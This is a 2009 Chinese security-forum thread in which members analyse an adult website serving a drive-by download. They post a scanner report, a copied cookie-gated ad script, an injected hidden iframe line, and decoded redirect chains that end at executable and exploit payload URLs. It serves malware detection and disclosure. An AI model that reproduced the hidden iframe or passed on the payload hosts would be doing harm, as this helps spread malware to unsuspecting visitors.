http://888.67sese.com/（sex网站）[挂马][已检测by gtyre1]

悠柚

[2009-05-17 18:33:41] 发现iexplore.exe试图触发数字签名漏洞，已被成功阻止！

[ 本帖最后由 gtyre1 于 2009-5-17 19:59 编辑 ]

悠柚

威胁报告

已发现威胁总数: 9

Small-whitebg-red         病毒 (这是什么?)

已发现威胁: 9
这是完整列表:
威胁名称:         Downloader
位置:         http://888.67sese.com/html/bt/list18_17.html

       
威胁名称:         Downloader
位置:         http://888.67sese.com/html/wuxia/list25_1.html

       
威胁名称:         Downloader
位置:         http://888.67sese.com/html/bt/40999.html

       
威胁名称:         Downloader
位置:         http://888.67sese.com/html/chang/list26_1.html

       
威胁名称:         Downloader
位置:         http://888.67sese.com/html/bt/list18_1.html

       
威胁名称:         Downloader
位置:         http://888.67sese.com/html/bt/41002.html

       
威胁名称:         Downloader
位置:         http://888.67sese.com/html/taotu/list10_1.html

       
威胁名称:         直接链接到 Downloader
位置:         http://888.67sese.com/html/bt/list18_19.html

       
威胁名称:         直接链接到 Downloader
位置:         http://888.67sese.com/html/bt/40999.html

gtyre1

貌似网马在

http://888.67sese.com/hao.js

不过我用freshow解不了
貌似是判断cookie的

var Then = new Date();
Then.setTime(Then.getTime() + 12*60*60*1000 ); //秒分
var cookieString = new String(document.cookie);
var cookieHeader = "LpageTJ" ;
var beginPosition = cookieString.indexOf(cookieHeader);
if (beginPosition == -1)
{
        var newtop=0
        var newleft=0
        if (navigator.appName == "Netscape") {
                layerStyleRef="layer.";
                layerRef="document.layers";
                styleSwitch="";
        }
        else {
                layerStyleRef="layer.style.";
                layerRef="document.all";
                styleSwitch=".style";

        }
        var autoclick_ok=false;
        function toExit(){
                autoclick_ok=true;
                document.cookie = "Cookie9=LpageTJ;expires="+ Then.toGMTString() +";path=/";
    }

        function doMouseMove() {

                layerName = 'iit'
                eval('var curElement='+layerRef+'["'+layerName+'"]')
                eval(layerRef+'["'+layerName+'"]'+styleSwitch+'.visibility="hidden"')
               
                if(!autoclick_ok) {
                        eval('curElement'+styleSwitch+'.visibility="visible"')
                }else{
                        eval('curElement'+styleSwitch+'.visibility="hidden"')
                }
               
                eval('newleft=document.body.clientWidth-curElement'+styleSwitch+'.pixelWidth')
                eval('newtop=document.body.clientHeight-curElement'+styleSwitch+'.pixelHeight')
                eval('height=curElement'+styleSwitch+'.height')
                eval('width=curElement'+styleSwitch+'.width')
                width=parseInt(width)
                height=parseInt(height)
                if (event.clientX > (document.body.clientWidth - 10 - width))
                {
                newleft=document.body.clientWidth + document.body.scrollLeft - 10 - width
                }
                else
                {
                newleft=document.body.scrollLeft + event.clientX-10
                }
                eval('curElement'+styleSwitch+'.pixelLeft=newleft')

                if (event.clientY > (document.body.clientHeight - 5 - height))
                {
                newtop=document.body.clientHeight + document.body.scrollTop - 5 - height
                }
                else
                {
                newtop=document.body.scrollTop + event.clientY-10
                }
                eval('curElement'+styleSwitch+'.pixelTop=newtop')
        }

        document.onmousemove = doMouseMove;
        if (navigator.appName == "Netscape") {

        }
        else
        {
                document.write('<div id="outerdiv">')
                document.write('<a href="http://67.159.24.46/link/click.php?fromid=25761" target="_blank"><img ID=iit src="click.gif"  style="position:absolute;top:0pt;left:0pt;z-index:99;visibility:hidden;" border="0" onclick="toExit()"></a>')
                document.write('</div>')
        }
}

xiaoqiang305

他这里边得挨个网页去找的用freshow过滤不好使 实在是太费劲了，
抓了两个就不想抓了 。。。费劲 我在这里抓的<a target="_blank" href="http://a.46se.com/html/pic/list1_1.html">点击进入就去色色综合图区&nbsp;</a></font></strong></p>
黄网太可拍了
Log is generated by FreShow.
                    [object]http://com12l.3322.org/web/ActiveX.exe
                            [object]http://5l2o8.com/web/xp.css

pingfan5888

888.67sese.com/end.js

<iframe src=http:\/\/kuaile4444.3322.org\/a\/a1.htm?4 width=100 height=0><\/iframe>

gtyre1

关于:hxxp://888.67sese.com/解密的日志(全体输出 -  26):

Level  1>http://wo.40sese.com  
Level  2>http://a.46se.com/html/pic/list1_1.html
Level  3>http://a.46se.com/skin/default/end.js
Level  4>http://kuaile4444.3322.org/a/163.htm
Level  5>http://kuaile4444.3322.org/a/js.js
Level  6>http://kuaile4444.3322.org/a/ggbb.htm
Level  7>http://kuaile4444.3322.org/a/ggff.js
Level  7>http://kuaile4444.3322.org/a/ggff1.js
Level  8>http://5l2o8.com/web/xp.css  ●
Level  6>http://kuaile4444.3322.org/a/ggvod.htm
Level  7>http://kuaile4444.3322.org/a/ggvod.js
Level  8>http://5l2o8.com/web/xp.css  ●
Level  6>http://kuaile4444.3322.org/a/ggff.htm
Level  7>http://kuaile4444.3322.org/a/ff.js
Level  8>http://5l2o8.com/web/xp.css  ●
Level  6>http://kuaile4444.3322.org/a/ggfl.htm
Level  7>http://kuaile4444.3322.org/a/2222222222.swf  ●
Level  7>http://kuaile4444.3322.org/a/1111111111.swf  ●
Level  7>http://kuaile4444.3322.org/a/1111111111.swf  ●
Level  6>http://kuaile4444.3322.org/a/gg14.htm
Level  7>http://kuaile4444.3322.org/a/16.js
Level  7>http://kuaile4444.3322.org/a/15.js
Level  7>http://kuaile4444.3322.org/a/14.js
Level  8>http://5l2o8.com/web/xp.css  ●
Level  5>http://kuaile4444.3322.org/a/ggqm.htm
Level  6>http://com12l.3322.org/web/activex.exe  ●

日志由 Redoce1.9第46次修正版于 2009-5-17 19:47:45 生成。

(以上打点均为网马真实地址SWF除外)

[/quote]

[ 本帖最后由 gtyre1 于 2009-5-17 19:51 编辑 ]

mouse_0232

关于:hxxp://888.67sese.com/解密的日志(全体输出 -  27):

Level  1>http://a.46se.com/html/pic/list1_1.html
Level  2>http://a.46se.com/skin/default/end.js
Level  3>http://kuaile4444.3322.org/a/a1.htm?4
Level  4>http://kuaile4444.3322.org/a/163.htm
Level  5>http://kuaile4444.3322.org/a/js.js
Level  6>http://kuaile4444.3322.org/a/ggr.htm
Level  6>http://kuaile4444.3322.org/a/ggbb.htm
Level  7>http://kuaile4444.3322.org/a/ggff.js
Level  7>http://kuaile4444.3322.org/a/ggff1.js
Level  8>http://5l2o8.com/web/xp.css
Level  6>http://kuaile4444.3322.org/a/ytxxz.htm
Level  6>http://kuaile4444.3322.org/a/ggvod.htm
Level  7>http://kuaile4444.3322.org/a/ggvod.js
Level  6>http://kuaile4444.3322.org/a/ggff.htm
Level  7>http://kuaile4444.3322.org/a/ff.js
Level  8>http://5l2o8.com/web/xp.css
Level  6>http://kuaile4444.3322.org/a/ggfl.htm
Level  7>http://kuaile4444.3322.org/a/2222222222.swf
Level  7>http://kuaile4444.3322.org/a/1111111111.swf
Level  7>http://kuaile4444.3322.org/a/1111111111.swf
Level  6>http://kuaile4444.3322.org/a/gg14.htm
Level  7>http://kuaile4444.3322.org/a/16.js
Level  7>http://kuaile4444.3322.org/a/15.js
Level  7>http://kuaile4444.3322.org/a/14.js
Level  8>http://5l2o8.com/web/xp.css
Level  5>http://kuaile4444.3322.org/a/ggqm.htm
Level  6>http://com12l.3322.org/web/activex.exe

此网址由幸福的耗子解密(本人博客www.mouse0232.com)

Sherry.ai

不容易....这次不是OK.exe

knifed

Log is generated by FreShow.
[wide]http://a.46se.com/html/pic/list1_1.html
    [script]http://a.46se.com/skin/default/top.js
    [script]http://a.46se.com/skin/default/end.js
        [frame]http://kuaile4444.3322.org/a/a1.htm?4
            [frame]http://kuaile4444.3322.org/a/163.htm
                [script]http://kuaile4444.3322.org/a/js.js
                    [frame]http://kuaile4444.3322.org/a/14.htm
                    [frame]http://kuaile4444.3322.org/a/c.htm
                    [frame]http://kuaile4444.3322.org/a/e.htm
                        [script]http://kuaile4444.3322.org/a/do.css
                        [script]http://kuaile4444.3322.org/a/e.css
                        [object]http://5l2o8.com/web/13.exe
    [script]http://s26.cnzz.com/stat.php?id=1013994&web_id=1013994

jhtl

网站不错，就是图片好多打不开。。。